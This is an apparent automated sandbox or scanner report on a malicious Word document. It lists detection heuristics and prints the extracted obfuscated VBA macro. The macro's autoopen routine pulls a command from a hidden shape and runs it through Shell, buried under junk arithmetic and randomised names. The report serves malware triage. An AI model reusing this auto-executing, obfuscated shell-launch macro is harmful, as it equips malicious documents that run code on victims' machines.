Verdict: MALICIOUS
Risk Score: 292
Heuristics (10):
- ClamAV: Doc.Malware.Generic-6776293-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6776293-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `. _ Shell(twRquVZa, imwLJ), QAmQj) Set wbNvXBWPqiYVORd = JUEGzdZiqiFYkahonXNWZ`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True Sub autoopen() fzqAH`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6611 bytes |

SHA-256: 25489921e00612c266b0232c56446a61b995a70827df33bcb0482f67d8a643cc

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 169 of 203 identifiers look randomly generated (e.g. 'VKXzWdMkJtGaawtIbMiIPRkw'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "SkQIktkDvUAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
fzqAH
End Sub
Attribute VB_Name = "tzIfdLKPAkdT"
Function fzqAH()
On Error Resume Next
Set ttCLOVKtiqPPkF = QEwWrAkLEOqSviWuFt
QJnfHozATOLtvBWO = LibCIizzYCPLIwJVXpLdY
isARwtUvRZTmiaSJHbqijmk = KRBYXMKlKUwjCrlDcdlprV / CLng(91700636) * 228697503 / Tan(17857619) + iknqHvHKGisvYFPic - Cos(95573804) + (197046274 / Int(GQpmFGBuzpESWIdZwUMBb))
Set jKGOiTjmIpElYkzbMtmLaNAZ = YUWLWOQKmZrWtkLCoPLQjPM
mqHYTXVJjVGzJal = oalLFFTJaIlzpJJIIOZ
HrqPDiqYiMtNdkcIdABj = wwKlYUXLzrvBFSzjWH / CLng(155141706) * 96833386 / Tan(309417374) + NPXTEjBiHMsJJsjdfOTM - Cos(215810836) + (141764872 / Int(MYRiYHtiScSkuOEPqJSjiIvJ))
Set kGCGSibHJwODnWQILRWo = TPPWPqdDkPJEOklazq
MZmYliawjISjndJQqmjDnzEY = EzZliiNbZcwhqisouzuSj
aETunNnJOVNrhiBKBZ = IOBNjzIrOtAJGB / CLng(224030786) * 163125973 / Tan(139298940) + kvAnPNbTzwNnjwUNX - Cos(47542431) + (167491099 / Int(juiWZQOLGqzFftQiEVznmQA))
Set BaLpCWnvJJwjDPrVNu = mBljGwcHwaGEFuqtbc
shIZOZZCNqLiYEZW = QqFrZPqUDFrpNWQsD
mdcWKjvORlvizj = XdkXSSRSELTiMATvlUC / CLng(252900390) * 294268554 / Tan(279968004) + jYvKwFYUGKRqtfUlkVLXKrw - Cos(232584906) + (96822958 / Int(qJNzufhjEzWHTMfqMXvKaPRj))
Set OWTUYwkbTNZOwwkPtpszwYB = fFdiuGwhPCEWflm
dkFtbwiPqsHwdEuqVNp = UBhMOswtuNjHDUVMTH
iaOrBzAELHNBRwSDbDsi = zkVcIAvJiiWNiGsGKfNOn / CLng(258580687) * 250732315 / Tan(211820281) + RLkQuIadvkqsPtzE - Cos(308309858) + (191446902 / Int(rojpazRYfPvKwoQqpKt))
Set hSjoZM = SkQIktkDvUAQ.Shapes(AOOHJQlJK + "LpMSUrnBv" + VOcBwrT).TextFrame
Set oRXBdmqUjlQiXHYnC = uuCMGwVjvuAPahuvadOYEins
usFUIGJHditLbLY = uqvTRKijbjuZdrLGKEMG
OnorIzwBkwRptJssZ = kJVsbLkdmWmBXzSPjCHbJN / CLng(238055162) * 227142253 / Tan(287232974) + cjkiTOlObwvVMcHiKbOjb - Cos(123404293) + (155134662 / Int(dpkzjXZmBtiBsEDXPIXV))
Set rwwvQaAupadcaqbcDHF = tcWSwCbDkkSXbcdptvjbZhpQ
IGKYUZMJbjOZjwOzwKFI = AwNmiIYiWLnGoow
fQLFOAvOPNwUbcXjH = HIzlmRoiFVbSrKRiRt / CLng(306386352) * 20923723 / Tan(289605715) + CwWULDDtnEzRho - Cos(127570594) + (297911498 / Int(tQkvanzWmDsLdoEfGFwP))
Set vERjAajaTiDHnzKq = PnjEamUoKvHaTVGE
APXjiAjkjtnWAYSmaYH = HVSwuqfcAzJzCKwuSjj
CUusjSKWpntwwdVfzbmsVE = jjqUpbXUtrVZnaZQbfInN / CLng(39468782) * 84597028 / Tan(333741208) + pRzruoRwkNJpwUvSTzF - Cos(194625929) + (24390320 / Int(EXKKMNRWaWrvzJZczDDbD))
twRquVZa = hSjoZM.ContainingRange + iUiCITIG + GEidn + WIUSu + GYrTTvB + zLqXjO + zGcCUR + nYpmzYtb + jcomOJwm + LfjFob
Set RzCvDNsDjkHbiWlkMGVLj = zNFokzUmFRlBLX
jlnMXWtEQsrOaQBaLBPApp = dvjwiqpcKOzcVizJf
JpwsitVErazwXzt = KRoZOOaPhAcofsMsku / CLng(211336318) * 3683625 / Tan(124731041) + MpaazPcOqAizYhUFquOhL - Cos(221818473) + (110785398 / Int(YwNHLcRtCZEzwoPKmSJc))
Set VKXzWdMkJtGaawtIbMiIPRkw = GIXYsCpWTZYWZsOC
judFWuswWwVrhDaZ = PVoMQrQDHZVmCTUGChqUGk
iZVEUfmVzwmcsNBSD = CPUXLUiBkfVkFjfH / CLng(64972623) * 253804740 / Tan(307725382) + vXVDXqPqbtAOmGEVtHOBZT - Cos(307944392) + (43938528 / Int(NrGzlDOYQRitQzVEoZriHzwc))
Set QbJCiktfwciZmLuGiGSovLS = YwQTWApJBjcojcEmHKibHbsA
PRpSNzEIKdmTaJvmZYDjGWC = fjldrrzDQYGjAr
lXfZzSSjBnoiDpQotPnmjM = RSjiDBCLlhkRLazDiMz / CLng(235175962) * 276376059 / Tan(18861446) + tOAkNUMEHZwNGSj - Cos(102843603) + (204572431 / Int(bCATXENvLFahclOJmUDRprZd))
Set VzREhtVkFmYdbIdkcUK = BaqraOwJzAmcOlGJanEjm
zdnTiLhJTtjOXuIaiSwMmEA = PqBTJpQbwKaNEGflcohsszOL
AJlmaEudqDsJNz = dIPMTvWXnLjwXHDPbqTJ / CLng(210882123) * 201962536 / Tan(270771903) + FjjNDnbOpCOkjBrEdmw - Cos(175857905) + (280079089 / Int(XVnoQTtpwwTrGnM))
Set PIRPvuRkVBDZBHhrfHkTL = TmYoChfzDuBRPvddbt
GJhjFYYZZVSqlau = fqHrkFYwJYjrmOBfqKELmF
QdHFblDPqUFwmUBYB = jXjohmLTmzaWjDZYqOczw / CLng(82358312) * 35642637 / Tan(58361972) + XhPOKplCZDilcwUtIzEoUkC - Cos(165826308) + (97193744 / Int(nvBpWRXvJFvEbKoTKAqm))
Set IwTaTZYjitHkpHTXMdHXPfC = iXAJKQoswclBhA
JEkruoQTJkwKwzhfcwOsw = OVOEOmNVSpLvwTioIQR
rZLFrvRzJETHmk = PcpZiGnRJwBzNAnnzarhoJ / CLng(59275373) * 87714812 / Tan(130999021) + QMOWDJNdPLTrnwDICG - Cos(275793668) + (314121087 / Int(wVQVhuDBGTbFKp))
Const imwLJ = 0
Set nTZdQozUIErRvERwSktqthFc = CqlfAmShsNcQAbM
wnbDzYLiEpSEwDFOwY = zLoIRZkCqpfSJhXwu
YFdfHbKTNjpHOTbMOHHf = iPWUpYXJXbGLkYTl / CLng(121534872) * 31558406 / Tan(83799357) + wMANjaLqwSPoPTtpGLRDnKpI - Cos(226202891) + (319236205 / Int(vIbwDvhLSPJlOMjNELSw))
Set VoOBEnFjslKErzIjiiQRj = iEbAJhwPuqwHtM
MBjRhcpoPwsTKNmnND = JKaEdYkdrTHkGwKWj
AwaoQLCRNoCHCjDbCMlzD = wzzUINmXzqGENFqUuPCLLwa / CLng(239840787) * 112026507 / Tan(158713621) + itzkjfHCbrvCoipoLAwV - Cos(331514527) + (243599610 / Int(SWvrhzZNDkhIdCGXYGDPd))
Set WrikjANAGtGKJWJFs = nYHMEHdOKrzGkIItPNvpju
DMQaABVAYtvLqKK = bHRqWAAJwCQGvKCDsQEzoh
NorbNpwRjFbTiRDlDMHb = lPEOrrSZGKwuiEBiYnTCkhAU / CLng(281979512) * 126311239 / Tan(245963113) + fAnhFicZnNWzdscucYENCH - Cos(205068218) + (165655347 / Int(ZNDOjXXGiuFXQozccrKQVY))
Set EJHiwjFdazJPcCofu = LbhXMCGlFHjnqqAzMi
ZulMVQVnmzRTKbHzclhzEY = dwwnJSPfqFsUcaOL
qPTlnnVLjsXMili = hHOYcMUXUbNSGf / CLng(157301389) * 90357242 / Tan(167463301) + GpEbpKbbZarTLUKTvSA - Cos(258098237) + (201004045 / Int(uwRMZDFDUJmDftwGREzA))
Set ESnUSiYuhhfhJmNIAFcfu = BMloIIamOqbWjHczpnc
RbMXAviOjCudnfQbjdV = UvSpGmFFfBQoDUHZz
oMdLCMvwiBqBQLSL = VIWRNqYjimGaTXq / CLng(179343571) * 144318200 / Tan(272852248) + mJtGtIDDPilEWrO - Cos(246247624) + (115868003 / Int(waWFcTZpXPizauWJYzcB))
Set RwwriAYOJDCjhkSErlwOmlzC = hvHLkfETbluHFCwrmBN
PHfSRjKaPMjwwTAEQCZ = wNGwYzljAWAjlaIaQpt
UdEOFzKlCsbjbp = CBhuUuaasMwLVKZnbJWD / CLng(139206002) * 59019974 / Tan(285067997) + amAhHvQHvzFZivZItDLCImp - Cos(176227378) + (184544088 / Int(AaFmItJoThutSz))
JmJEz = Array(jiFmZwZO, hjZhEkoZ, EqhMSR, Interaction _
. _
Shell(twRquVZa, imwLJ), QAmQj)
Set wbNvXBWPqiYVORd = JUEGzdZiqiFYkahonXNWZ
flmnAQWJUYwoQV = tFSBjFswwfPBjhqDHI
pTUMcJHjKhZvJLS = SuVpzmpoHkOncdUrfKfDZsp / CLng(288276301) * 185438384 / Tan(166786445) + PYjFpRnYJlTJDifFruUEj - Cos(85093046) + (225779536 / Int(zjOUZEdNXEaPXfZVo))
End Function